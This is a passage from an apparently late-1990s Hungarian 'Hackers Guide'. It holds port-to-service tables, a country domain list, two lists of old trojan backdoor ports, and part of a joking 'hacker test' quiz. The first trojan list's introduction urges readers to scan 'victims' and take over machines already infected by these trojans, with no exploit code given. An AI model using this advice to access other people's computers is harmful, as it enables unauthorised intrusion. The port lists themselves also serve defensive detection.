730=IBM NetView DM/6000 send/tcp 731=IBM NetView DM/6000 receive/tcp 741=netGWnetgw 742=Network based Rev. Cont. Sys. 744=Flexible License Manager 747=Fujitsu Device Control 748=Russell Info Sci Calendar Manager 749=kerberos administration 751=pump 752=qrh 754=send 758=nlogin 759=con 760=ns 762=quotad 763=cycleserv 765=webster 767=phonephonebook 769=vid 771=rtip 772=cycleserv2 774=acmaint_dbd 775=acmaint_transd 780=wpgs 786=Concertconcert 800=mdbs_daemon 996=Central Point Software 997=maitrd 999=puprouter 1023=Reserved 1024=Reserved 1025=network blackjack 1030=BBN IAD 1031=BBN IAD 1032=BBN IAD 1067=Installation Bootstrap Proto. Serv. 1068=Installation Bootstrap Proto. Cli. 1080=SOCKS 1083=Anasoft License Manager 1084=Anasoft License Manager 1155=Network File Access 1222=SNI R&D network 1248=hermes 1346=Alta Analytics License Manager 1347=multi media conferencing 1347=multi media conferencing 1348=multi media conferencing 1349=Registration Network Protocol 1350=Registration Network Protocol 1351=Digital Tool Works (MIT)
90
Hackers Guide
1352=/Lotus Notelotusnote 1353=Relief Consulting 1354=RightBrain Software 1355=Intuitive Edge 1356=CuillaMartin Company 1357=Electronic PegBoard 1358=CONNLCLIconnlcli 1359=FTSRVftsrv 1360=MIMERmimer 1361=LinX 1362=TimeFliestimeflies 1363=Network DataMover Requester 1364=Network DataMover Server 1365=Network Software Associates 1366=Novell NetWare Comm Service Platform 1367=DCSdcs 1368=ScreenCastscreencast 1369=GlobalView to Unix Shell 1370=Unix Shell to GlobalView 1371=Fujitsu Config Protocol 1372=Fujitsu Config Protocol 1373=Chromagrafxchromagrafx 1374=EPI Software Systems 1375=Bytexbytex 1376=IBM Person to Person Software 1377=Cichlid License Manager 1378=Elan License Manager 1379=Integrity Solutions 1380=Telesis Network License Manager 1381=Apple Network License Manager 1382=udt_os 1383=GW Hannaway Network License Manager 1384=Objective Solutions License Manager 1385=Atex Publishing License Manager 1386=CheckSum License Manager 1387=Computer Aided Design Software Inc LM 1388=Objective Solutions DataBase Cache 1389=Document Manager 1390=Storage Controller 1391=Storage Access Server 1392=Print Managericlpv-pm 1393=Network Log Server 1394=Network Log Client 1395=PC Workstation Manager software 1396=DVL Active Mail 1397=Audio Active Mail 1398=Video Active Mail 1399=Cadkey License Manager 1400=Cadkey Tablet Daemon 1401=Goldleaf License Manager
91
Hackers Guide
1402=Prospero Resource Manager 1403=Prospero Resource Manager 1404=Infinite Graphics License Manager 1405=IBM Remote Execution Starter 1406=NetLabs License Manager 1407=DBSA License Manager 1408=Sophia License Manager 1409=Here License Manager 1410=HiQ License Manager 1411=AudioFileaf 1412=InnoSysinnosys 1413=Innosys-ACLinnosys-acl 1414=IBM MQSeriesibm-mqseries 1415=DBStardbstar 1416=Novell LU6.2novell-lu6.2 1417=Timbuktu Service 1 Port 1417=Timbuktu Service 1 Port 1418=Timbuktu Service 2 Port 1419=Timbuktu Service 3 Port 1420=Timbuktu Service 4 Port 1421=Gandalf License Manager 1422=Autodesk License Manager 1423=Essbase Arbor Software 1424=Hybrid Encryption Protocol 1425=Zion Software License Manager 1426=Satellite-data Acquisition System 1 1427=mloadd monitoring tool 1428=Informatik License Manager 1429=Hypercom NMSnms 1430=Hypercom TPDUtpdu 1431=Reverse Gosip Transport 1432=Blueberry Software License Manager 1433=Microsoft-SQL-Server 1434=Microsoft-SQL-Monitor 1435=IBM CISCibm-cics 1436=Satellite-data Acquisition System 2 1437=Tabulatabula 1438=Eicon Security Agent/Server 1439=Eicon X25/SNA Gateway 1440=Eicon Service Location Protocol 1441=Cadis License Management 1442=Cadis License Management 1443=Integrated Engineering Software 1444=Marcam License Management 1445=Proxima License Manager 1446=Optical Research Associates License Manager 1447=Applied Parallel Research LM 1448=OpenConnect License Manager 1449=PEportpeport 1450=Tandem Distributed Workbench Facility
92
Hackers Guide
1451=IBM Information Management 1452=GTE Government Systems License Man 1453=Genie License Manager 1454=interHDL License Manager 1454=interHDL License Manager 1455=ESL License Manager 1456=DCAdca 1457=Valisys License Manager 1458=Nichols Research Corp. 1459=Proshare Notebook Application 1460=Proshare Notebook Application 1461=IBM Wireless LAN 1462=World License Manager 1463=Nucleusnucleus 1464=MSL License Manager 1465=Pipes Platform 1466=Ocean Software License Manager 1467=CSDMBASEcsdmbase 1468=CSDMcsdm 1469=Active Analysis Limited License Manager 1470=Universal Analytics 1471=csdmbasecsdmbase 1472=csdmcsdm 1473=OpenMathopenmath 1474=Telefindertelefinder 1475=Taligent License Manager 1476=clvm-cfgclvm-cfg 1477=ms-sna-server 1478=ms-sna-base 1479=dberegisterdberegister 1480=PacerForumpacerforum 1481=AIRSairs 1482=Miteksys License Manager 1483=AFS License Manager 1484=Confluent License Manager 1485=LANSourcelansource 1486=nms_topo_serv 1487=LocalInfoSrvr 1488=DocStordocstor 1489=dmdocbrokerdmdocbroker 1490=insitu-confinsitu-conf 1491=anynetgateway 1492=stone-design-1 1493=netmap_lmnetmap_lm 1494=icaica 1495=cvccvc 1496=liberty-lmliberty-lm 1497=rfx-lmrfx-lm 1498=Watcom-SQLwatcom-sql 1499=Federico Heinz Consultora
93
Hackers Guide
1500=VLSI License Manager 1501=Satellite-data Acquisition System 3 1502=Shivashivadiscovery 1503=Databeamimtc-mcs 1504=EVB Software Engineering License Manager 1505=Funk Software, Inc. 1524=ingres 1525=oracle 1525=Prospero Directory Service non-priv 1526=Prospero Data Access Prot non-priv 1527=oracletlisrv 1529=oraclecoauthor 1600=issd 1651=proshare conf audio 1652=proshare conf video 1653=proshare conf data 1654=proshare conf request 1655=proshare conf notify 1661=netview-aix-1netview-aix-1 1662=netview-aix-2netview-aix-2 1663=netview-aix-3netview-aix-3 1664=netview-aix-4netview-aix-4 1665=netview-aix-5netview-aix-5 1666=netview-aix-6netview-aix-6 1986=cisco license management 1987=cisco RSRB Priority 1 port 1988=cisco RSRB Priority 2 port 1989=cisco RSRB Priority 3 port 1989=MHSnet systemmshnet 1990=cisco STUN Priority 1 port 1991=cisco STUN Priority 2 port 1992=cisco STUN Priority 3 port 1992=IPsendmsgipsendmsg 1993=cisco SNMP TCP port 1994=cisco serial tunnel port 1995=cisco perf port 1996=cisco Remote SRB port 1997=cisco Gateway Discovery Protocol 1998=cisco X.25 service (XOT) 1999=cisco identification port 2009=whosockami 2010=pipe_server 2011=raid 2012=raid-ac 2013=rad-am 2015=raid-cs 2016=bootserver 2017=terminaldb 2018=rellpack 2019=about
94
Hackers Guide
2019=xinupageserver 2020=xinupageserver 2021=xinuexpansion1 2021=down 2022=xinuexpansion2 2023=xinuexpansion3 2023=xinuexpansion4 2024=xinuexpansion4 2025=xribs 2026=scrabble 2027=shadowserver 2028=submitserver 2039=device2 2032=blackboard 2033=glogger 2034=scoremgr 2035=imsldoc 2038=objectmanager 2040=lam 2041=interbase 2042=isis 2043=isis-bcast 2044=primsl 2045=cdfunc 2047=dls 2048=dls-monitor 2065=Data Link Switch Read Port Number 2067=Data Link Switch Write Port Number 2201=Advanced Training System Program 2500=Resource Tracking system server 2501=Resource Tracking system client 2564=HP 3000 NS/VT block mode telnet 2784=world wide web - development 3049=ccmail 3264=ccmail, cc:mail/lotus 3333=dec-notes 3984=MAPPER network node manager 3985=MAPPER TCP/IP server 3986=MAPPER workstation server 3421=Bull Apprise portmapper 3900=Unidata UDT OS 4132=NUTS Daemonnuts_dem 4133=NUTS Bootp Server 4343=UNICALL 4444=KRB524 4672=remote file access server 5002=radio free ethernet 5010=TelepathStarttelelpathstart 5011=TelepathAttack 5050=multimedia conference control tool
95
Hackers Guide
5145=rmonitor_secure 5190=aol, America-Online 5300=HA cluster heartbeat 5301=hacl-gs # HA cluster general services 5302=HA cluster configuration 5303=hacl-probe HA cluster probing 5305=hacl-test 6000-6063=x11 X Window System 6111=sub-process HP SoftBench Sub-Process Control 6141/=meta-corp Meta Corporation License Manager 6142=aspentec-lm Aspen Technology License Manager 6143=watershed-lm Watershed License Manager 6144=statsci1-lm StatSci License Manager - 1 6145=statsci2-lm StatSci License Manager - 2 6146=lonewolf-lm Lone Wolf Systems License Manager 6147=montage-lm Montage License Manager 7000=afs3-fileserver file server itself 7001=afs3-callback callbacks to cache managers 7002=afs3-prserver users & groups database 7003=afs3-vlserver volume location database 7004=afs3-kaserver AFS/Kerberos authentication service 7005=afs3-volser volume managment server 7006=afs3-errors error interpretation service 7007=afs3-bos basic overseer process 7008=afs3-update server-to-server updater 7009=afs3-rmtsys remote cache manager service 7010=ups-online onlinet uninterruptable power supplies 7100=X Font Service 7200=FODMS FLIP 8010=Wingate 8181=IMail 9535=man
************************************************************************************************
Nemzetkzi domain-ek Az albbi listtSiRiUsksztette. Nzztek meg az o webhelyket is:http://forbidden.net-security.org Afghanistan .af Albania .al Algeria .dz America Samoa .as Andorra .ad Angola .ao
96
Hackers Guide
Anguilla .ai Antarctica .aq Antigua .ag Argentina .ar Armenia .am Aruba .aw Australia .au Austria .at Azerbaijan .az Bahamas .bs Bahrain .bh Bangladesh .bd Barbados .bb Belarus .by Belgium .be Belize .bz Benin .bj Bermuda .bm Bhutan .bt Bolivia .bo Bosnia-Hercegovina .ba Botswana .bw Bouvet Island .bv Brazil .br British Indian Ocean .io Brunei Darussalam .bn Bulgaria .bg Burkina Faso .bf Burundi .bi Cambodia .kh Cameroon .cm Canada .ca Cape Verde .cv Caymen Islands .ky Central African Republic .cf Chad .td Chile .cl China .cn Christmas Island .cx Cocos Islands .cc Colombia .co Comoros .km Congo .cg Cook Island .ck Costa Rica .cr Cote d'Ivoire(Ivory Coast) .ci Croatia .hr Cuba .cu Cyprus .cy Czech Republic .cz
97
Hackers Guide
Denmark .dk Djibouti .dj Dominica .dm Dominican Republic .do East Timor .tp Ecuador .ec Egypt .eg El Salvador .sv Equatorial Guinea .gp Estonia .ee Ethiopia .et Falkland Islands .fk Faroe Islands .fo Fiji .fj Finland .fi France .fr French Guiana .gf French Polynesia .pf French Southern Territories .tf Gabon .ga Gambia .gm Georgia(Not the state!) .ge Germany .de Ghana .gh Gibraltar .gi Greece .gr Greenland .gl Grenada .gd Guadeloupe .gp Guam .gu Guatemala .gt Guinea .gn Guinea-Bissau .gw Guyana .gy Haiti .ht Heard & McDonald Islands .hm Honduras .hn Hong Kong .hk Hungary .hu Iceland .is India .in Indonesia .id Iran .ir Iraq .iq Ireland .ie Israel .il Italy .it Jamaica .jm Japan .jp Jordan .jo
98
Hackers Guide
Kazakhstan .kz Kenya .ke Kiribati .ki Korea(North) .kp Korea(South) .kr Kuwait .kw Kyrgyzstan .kg Lao People's Democratic Republic .la Latvia .lv Lebanon .lb Lesotho .ls Liberia .lr Libyan Arab Jamahiriyan(Libya).ly Liechtenstein .li Lithuania .lt Luxembourg .lu Macau .mo Madagascar .mg Malawi .mw Malaysia .my Maldives .mv Mali .ml Malta .mt Marshall Islands .mh Martinique .mq Mauritania .mr Mauritius .mu Mexico .mx Micronesia .fm Moldovia .md Manaco .mc Mongolia .mn Montserrat .ms Morocco .ma Mozambique .mz Myanmar .mm Namibia .na Nauru .nr Nepal .np Netherlands .nl Dutch West Indies .an Neutral Zone .nt New Caledonia .nc New Zealand .nz Nicaragua .ni Niger .ne Nigeria .ng Niue .nu Norfolk Island .nf North Mariana Islands .mp
99
Hackers Guide
Norway .no Oman .om Pakistan .pk Palau .pw Panama .pa Papua New Guinea .pg Paraguay .py Peru .pe Philippines .ph Pitcairn Island .pn Poland .pl Portugal .pt Puerto Rico .pr Qatar .qa Reunion Island .re Romania .ro Russian Federation .ru Rwanda .rw St. Helena .sh St. Kitts and Nevis .kn St. Lucia .lc St. Pierre and Miquelon .pm St. Vincent .vc Samoa .ws San Marino .sm Sao Tome .st Saudi Arabia .sa Senegal .sn Seychelles .sc Sierra Leone .sl Singapore .sg Slovak Republic .sk Slovenia .si Solomon Islands .sb Somalia .so South Africa .za Spain .es Sri Lanka .lk Sudan .sd Suriname .sr Svalbard .sj Swaziland .sz Sweden .se Switzerland .ch Syrian Arab Republic .sy Taiwan .tw Tajkistan .tj Tanzania .tz Thailand .th Togo .tg
100
Hackers Guide
Tokelau .tk Tonga .to Trinidad and Tobago .tt Tunisia .tn Turkey .tr Turkmenistan .tm Turks and Caicos Islands .tc Tuvalu .tv Uganda .ug Ukraine .ua United Arab Emirates .ae United Kingdom .uk United States .us Uruguay .uy Uzbekistan .uz Vanuatu .vu Vatican City .va Venzuela .ve Vietnam .vn Virgin Islands(British) .vg Virgin Islands(U.S.) .vi Wallis and Fortuna Islands .wf Western Sahara .eh Yamen .ye Yugoslavia .yu Zaire .zr Zambia .zm Zimbabwe .zw
************************************************************************************************
A legismertebb trojai programok s portjaik I. Remnyeim szerint az sszes itt felsorolt port cm passzol az adott trojan programhoz. Ha mondjuk portscannerrel letapogatod az ldozatot gpt s a felsoroltak egyikt (mrmint a portokt) nyitva tallod, akkor az adott trojannal egybol kapcsoldhatsz a lamer gphez, ugyanis mr valaki megeloztt. Megprbltam gy rendezni, hogy elore raktam a port cmet nvekvo sorrendben, majd utna az aktulis trojan program nevt! J csemegzst s sikeres hackelst! sszedobta: Nestan 121 456 555 BO jammerkillahV Hackers Paradise Stealth Spy
101
Hackers Guide
555 666 1001 1001 1011 1033 1170 1170 1234 1243 1245 1245 1245 1245 1492 1509 1600 1807 1981 1999 2001 2023 2023 2115 2140 2140 2565 2583 2801 2801 3700 4092 4590 5000 5001 5321 5400 5401 5402 5569 5742 6400 6670 6939 6969 6969 6969 7000 7300 7301
Phase0 Attack FTP, Satanz Backdoor Silencer WebEx Doly Trojan Netspy Psyber Stream Server Streaming Audio Trojan Ultors Trojan SubSeven VooDoo Doll GabanBus NetBus Vodoo FTP99CMP Psyber Streaming Server Shivka-Burka SpySender Shockrave BackDoor Trojan Cow Ripper Pass Ripper Bugs Deep Throat The Invasor Striker Wincrash2 Phineas Phineas Phucker Portal of Doom WinCrash ICQTrojan Sockets de Troie Sockets de Troie 1.x Firehotcker Blade Runner Blade Runner 1.x Blade Runner 2.x Robo-Hack Wincrash The tHing DeepThroat Indoctrination GateCrasher Priority Gatecrasher Remote Grab NetMonitor NetMonitor 1.x
102
Hackers Guide
7306 7306 7307 7308 7789 7789 9872 9873 9874 9875 9875 9989 10067 10167 11000 11223 12076 12223 12346 12361 12362 16969 20000 20001 20034 20034 21544 22222 23456 23456 23456 26274 30100 30129 30303 30999 31337 31338 31338 31339 31339 31666 33333 34324 34324 34324 40412 40421 40422 40423
NetMonitor 2.x NetMonitor NetMonitor 3.x NetMonitor 4.x ICKiller ICQKiller Portal of Doom Portal of Doom 1.x Portal of Doom 2.x Portal of Doom 3.x Portal of Doom iNi-Killer Portal of Doom 4.x Portal of Doom 5.x Senna Spy ProgenicTrojan Gjamer Hack?99 KeyLogger NetBus 1.x Whack-a-mole Whack-a-mole 1.x Priority Millenium Millennium NetBus 2 Pro NetBus Pro GirlFriend Prosiak Evil FTP Ugly FTP WhackJob Delta NetSphere Masters Paradise Socket23 Kuang Back Orifice Back Orifice DeepBO NetSpy DK NetSpy DK BOWhack Prosiak BigGluck Tiny Telnet Server BigGluck The Spy Masters Paradise Masters Paradise 1.x Masters Paradise 2.x
103
Hackers Guide
40423 40426 50505 50766 53001 61466 65000
Master Paradise Masters Paradise 3.x Sockets de Troie Fore, Schwindler Remote Windows Shutdown Telecommando Devil
************************************************************************************************
A legismertebb trojai programok s portjaik II. port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email pw Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy port 31 - Hackers Paradise port 80 - Executor port 456 - Hackers Paradise port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Satanz Backdoor port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1245 - VooDoo Doll port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4590 - ICQTrojan port 5000 - Sockets de Troie
104
Hackers Guide
port 5001 - Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5569 - Robo-Hack port 5742 - WinCrash port 6670 - DeepThroat port 6771 - DeepThroat port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack'99 KeyLogger port 12345 - GabanBus, NetBus port 12346 - GabanBus, NetBus port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 - Delta port 31337 - Back Orifice port 31338 - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 - Delta
105
Hackers Guide
port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 61466 - Telecommando port 65000 - Devil ViDe0 (Joakim rsai alapjn)
************************************************************************************************
BUHERTOR TESZT 1.1 (C) Felix Lee, John Hayes and Angela Thomas, 1989 Magyar vltozat: Mrk Pter, 1994, 1995 rtkels: minden "igen" egy pontot r. 0x000 s 0x010 kztt: lamer 0x010 s 0x040 kztt: felhasznl 0x040 s 0x080 kztt: opertor 0x080 s 0x0C0 kztt: szmtgpbuzerns 0x0C0 s 0x100 kztt: buhertor 0x100 s 0x180 kztt: mester 0x180 s 0x200 kztt: varzsl Megjegyzs: ha nem rted a pontozst, akkor itt hagyd abba!!! 1.Hasznltl mr szmtgpet? 2....ngy rnl tovbb egyfolytban? 3.... nyolc rnl tovbb? 4.... tizenhat rnl tovbb? 5.... harminckt rnl tovbb? 6.Lyukasztottl valaha lyukszalagot? 7.Mulasztottl el rt, mert helyette programoztl? 8.Mulasztottl-e vizsgt? 9.Mulasztottl-e eskvt? 10....a sajt eskvdet? 11.Programoztl mr rszegen? 12....a programod msnap is mkdtt? 13.Irtl mr valaha replsszimultort? 14.Szedted mr szt a szmtgpedet? 15.Megvltoztattad valaha a 4 rtkt? 16....vletlenl?
106
Hackers Guide
17....Fortran nyelven kvl ms nyelvben is? 18.Adtl nevet a szmtgpednek? 19.Felhborodsz, mikor kijavtjk egy rendszer egy olyan hibjt, amit te eddig kihasznltl sajt cljaidra? 20.Szoktl monitor eltt lve enni? 21....aludni? 22.Tudod napra pontosan, hogy milyen ids vagy? 23.Prbltl mr valaha telefonon keresztl pizzt letlteni? 24.Talltl mr ki szmtgpes viccet? 25....Akadt olyan, aki nem rtette meg? 26.Tudsz idzni kedvenc szmtstechnikai szakknyvedbl? 27.... visszafel is? 28.Lttad a "Termintor"-t? 29.Lttad a "Csillagok hborj"-t ? 30.Lttad a "Jurassic Park"-ot? 31.Tudod mit jelent az ASCII rvidts? 32.... az EBCDIC? 33.El tudod olvasni a hexban vagy oktlisan megadott ASCII kdot? 34.Tudod az sszes ASCII vezrlkd nevt? 35.Tudsz EBCDIC kdot hexban rni s olvasni? 36.Tudsz EBCDIC-bl ASCII-ba s vissza konvertlni? 37.Tudod, hogy mely karakterek kdjai egyeznek meg ASCII-ban s EBCDIC-ben? 38.Tudod, hogy a gpeden mekkora a legnagyobb brzolhat egsz szm? 39.Hoztl mr ltre sajt aritmetikai knyvtrat, hogy nagyobb pontossgot rj el? 40.Fel tudod sorolni kett els tizenhat hatvnyt tetszleges sorrendben? 41.... harminckettedik hatvnyig? 42.... hatvannegyedik hatvnyig? 43.Tudsz rnzssel lyukkrtyt olvasni? 44....s tapintssal? 45.Mdostottad mr egy program binris kdjt? 46....a program futsa kzben? 47.Hasznltl mr overlay programokat? 48.Tallkoztl mr valamilyen IBM vagy Microsoft nagyfnkkel? 49.Ismered valamelyik fejlesztmrnkket? 50.Fnykpeztl mr monitort? 51.Nztl mr videt a szmtgped monitorn? 52.Szkenneltl mr kpet? 53.Optimalizltl mr res ciklust? 54.Irtl mr bubork rendezprogramot? 55.Szokott beszlni hozzd a szmtgped? 56....s te hozz? 57.Beszlgettl mr modemmel? 58....vlaszolt is? 59.Tudsz 1200 bauddal ftylni? 60.... s 14400-zal? 61.El tudsz ftylni egy tone telefonszmot? 62.Lttl mr kzvetlen kzelrl rendszersszeomlst? 63....te okoztad? 64.Tudsz ciklikus puffert rni?
107
Hackers Guide
65....Tudod mi a ciklikus puffer? 66.Szoktl zenlni a sornyomtatddal? 67.... a diszk meghajtddal? 68.... a streamereddel? 69.Van Snoopy falinaptrad? 70.... lejrt? 71.Van karakterekbl sszerakott kped... 72.... Mona Lisrl? 73.... a vllalatodrl? 74.... Einsteinrl? 75.... magadrl? 76.Ksztettl mr karakterekbl sszerakott kpet? Tudod, hogy mit jelentenek ezek a rvidtsek? 77.... DASD 78.... Emacs 79.... ITS 80.... RSTS/E 81.... SNA 82.... Spool 83.... TCP/IP 84.... NFS? 85.... IP? 86.... SMTP? 87.... IRC? 88.... CSMA/CD? 89.... DNS? Hasznltad mr ezeket a programokat? 90.... TPU? 91.... TECO? 92.... Emacs? 93.... ed? 94.... vi? 95.... Xedit (in VM/CMS)? 96.... SOS? 97.... EDT? 98.... Wordstar? 99.Irtl mr CLIST-et? Programoztl mr... 100.... X windowban? 101.... CICS-ben? 102.Kaptl mr fnymsolt vagy telefaxon elkldtt mgneslemezt? 103.Mutattad mr meg kezdnek, hogy hol van az ltaluk keresett gomb? 104....a fkapcsol volt az?
108
Hackers Guide
Tagja voltl-e valaha az albbi szervezetek valamelyiknek? 105.... HT-1080 Z szakkr? 106.... C-64 szakkr? 107.... OS/2 klub? 108.... Microsoft felhasznlk barti kre? 109.... Szmtgp Gyllk trsasga? 110.Voltl mr tagja valamilyen szabvnygyi csoportnak? 111.Debuggoltl mr gpi kd programot telefonon keresztl? 112.Kaptl mr hangos levelet? 113....el tudtad olvasni? 114.Szoktl keresztrejtvnyt fejteni szmtgpen fut sztr segtsgvel? 115.Megcsinltad mr a Turing tesztet? 116....megbuktl? 117.Ejtettl mr el egy teli doboz lyukkrtyt? 118.... utna vissza tudtad rakni ket helyes sorrendbe? 119.... rnzs nlkl? 120.Hasznltl valaha IPCS-t? 121.Kerestl mr pnzt a szmtgped segtsgvel? 122.Futurista sznre van festve a szmtgped hza? 123.Kapcsoltl mr ki valaha sznetmentes tpegysget? 124.Maszkoltad mr valaha az NMI-t? 125.Hoztad mr vletlenl mkdsbe a tzolt rendszert? 126.... szndkosan? 127.... s mg mindig ugyanott dolgozol? 128.Megnyomtad mr valaha a tpfeszltsg vszkikapcsoljt? 129.... szndkosan? 130.Van a birtokodban kipusztult szoftver vagy hardver dokumentcija? 131.... mg most is szoktad olvasgatni? 132.Fejtettl mr vissza gpi kd programot? 133.... talltl benne hibkat? 134.Segtettl mr a boltban az eladnak a szmlz szmtgp kezelsben? 135.Prbltl mr telefonkrtyt hamistani? 136....hitelkrtyt? 137.Ejtettl mr le szmtgpet tbb mint kt emelet magassgbl? 138.Javtottl mr ki olyan szoftver hibt, aminek a ltezst a gyrt nem ismerte el? 139.Javtottl mr ki hardver hibt szoftverbl? 140.... s fordtva? 141.Tagja voltl mr valaha valamilyen felhasznli/tancsadi csoportnak? 142.Hivatkoztak mr rd valamilyen szmtgpes hobby jsgban? 143.Irtak mr valamilyen tettedrl az jsgok? 144.... megsztad? 145.Irtl mr program kommentet nem az anyanyelveden? 146.Tettl mr tnkre hardver eszkzt szoftverbl? 147.Prbltl mr javtani a "Buhertor teszt" eredmnyeden? 148.Viszel magaddal kinyomtatott programlistkat az ebdhez? 149....az gyba? 150.Javtottl mr mikrokernel hibt? 151.... kernel hibt?
109
Hackers Guide
152.Szoktl Turing gpet programozni? 153.Tudsz fejben postfixrl prefixre alaktani? 154.Tudsz fejben hexbl oktlisra konvertlni? 155....kt szmot sszeszorozni? 156.heztl mr mikzben az "Ebdel filozfusok" problmt prbltad megoldani? 157.Megoldottad mr a prhuzamos folyamatok lelltsnak problmjt? 158....helyesen? 159.Kerltl mr deadlock-ba spagetti evs kzben? 160.Irtl mr nreprodukl programot? 161.Kiswappelted mr valaha memribl a swapper programot? 162.Tudsz llapotdiagramot olvasni? 163.... szksged is van r? 164.Irtl mr lellthatatlan programot? 165....szndkosan? 166.rzl otthon vrusmintkat? 167.Gyorstottl mr fel szmtgpet gy, hogy kivettl egy jumpert? Tudod, hogy... 168.Tudod, hogy mi a mrnki pult? 169.... hasznlni is tudod? 170.Tudod, hogy milyen a ferrit-gyrs memria? 171.Tudod mit jelent a HCF? 172.... Hasznltad mr? 173.... szndkosan? 174.Tudod mi a lyukkrtya? 175....csinltl mr valaha? 176.Vltoztattl mr kedvenc programnyelveden? 177.... Ujrartad emiatt kedvenc programjaidat? 178.... Tudod, mi a Gray kd? 179.Tudod mi a klnbsg a DTE s a DCE kztt? 180.Tudod fejbl az RS-232C csatlakoz kiosztst? 181.Be tudsz huzalozni egy RS-232 csatlakozt behunyott szemmel? MEGVAN NEKED.... 182.Megvan neked a "nemhivatalos mosolysztr"? 183.Megvan neked az "aboszlut" viccek gyjtemnye? 184.Megvan neked az "Igazi Programoz" cm rs? 185....s mgis Pascalban programozol? 186.Van folyamatbra rajzol sablonod? 187.... a fikod mlyn porosodik? 188.Van sajt Murphy-trvny vagy graffiti gyjtemnyed? 189.Van szmtgpes szakcsknyved? 190.... prbltl mr megfzni belle valamit? 191.Van telefonmodemed? 192....terminlod? 193....jtk szmtgped? 194....PC-d? 195....munkallomsod?
110
Hackers Guide
196....mainframe-d? 197....szuperszmtgped? 198....hypercube-od vagy CRAY II-d? 199....nyomtatd? 200....lzernyomtatd? 201....streamered? 202....A/0-s plottered? 203.Van programozhat zsebszmolgped? 204.... inverz lengyel logiks? 205.Volt mr valaha tbb mint egy szmtgped? 206.... tbb mint ngy? 207.... tbb mint tizenhat? 208.Van otthon X25 vonalad? 209....digitlis telefonvonalad? 210.Van kln telefonvonalad a szmtgped szmra? 211....leglis? 212.Van hangkrtyd? 213....MIDI billentyzeted? 214....kettnl tbb merevlemezed? 215.A programjaid meghaladjk a 16 megabyte-ot? 216....256 megabyte-ot? 217....1 gigabyte-ot? 218....16 gigabyte-ot? 219....256 gigabyte-ot? 220....1 terabyte-ot? 221.Van CD ROM olvasd? 222.Van sajt streamer kazetta gyjtemnyed? 223....a kazettk cmkzetlenek? 224.Tbb mint 16 darab mgneslemezed van? 225....tbb mint 64? 226....tbb mint 256? 227....tbb mint 1024? 228.Van 8 collos lemezed? 229.Van a gpedben 5,25 collos lemezmeghajt? 230....kettnl tbb? 231.Megvan neked "A szmtgp programozs mvszete" cm knyv valamelyik ktete? 232....vgigcsinltad az sszes gyakorlatt? 233....fel tudod sorolni a meg nem rt ktetek cmt? 234.Tudsz idzni az "Igazi programoz"-bl? 235....rszt vettl az OS/360 projectben? 236.Van TTL atlaszod? 237.Van hrom vnl rgebben kinyomtatott programlistd? 238.Kinyomtatott Linux dokumentcid? MUNKA 239.Van munkd? 240....volt valaha munkd? 241....szmtgppel kapcsolatos (volt)?
111
Hackers Guide
242.Szoktl szokatlan idpontokban dolgozni? 243.Voltl mr rendszergazda? 244.Tbb megabyte-od van mint megaforintod? 245.Elhagytad mr valaha az llsodat azrt, hogy jobb szmtgpek kzelbe kerlj? 246.Bebiztostott munkahelyed van? 247....van kdod is, amivel bebiztostottad? 248.Estl mr t biztonsgi ellenrzsen? 249....megsztad? JTKOK 250.rtl el helyezst az iskolai Galaxy bajnoksgon? Jtszottl valaha 251....Impossible Mission-t? 252....Tetrist? 253....Alley Cat-et? 254....Block Out-ot? 255....Doom-ot? 256....Larry-t? 257....MUD-ot? 258.Irtl mr kalandjtkot? 259....real-time jtkot? 260....tbb jtkost kezel jtkot? 261....hlzatos jtkot? HARDVER 262.Hasznltl mr fnyceruzt? 263.... sajt gyrtmny volt? Hasznltl valaha 264....konzolrgpet? 265....lyukszalagot? 266....rgpet? 267....krtyaolvast/lyukasztt? 268....digitalizl tblt? ptettl valaha... 269....ZX-81-et? 270....Spectrumot? Tudod hogyan kell hasznlni a(z) 271....oszcilloszkpot? 272....voltmrt?
112
Hackers Guide
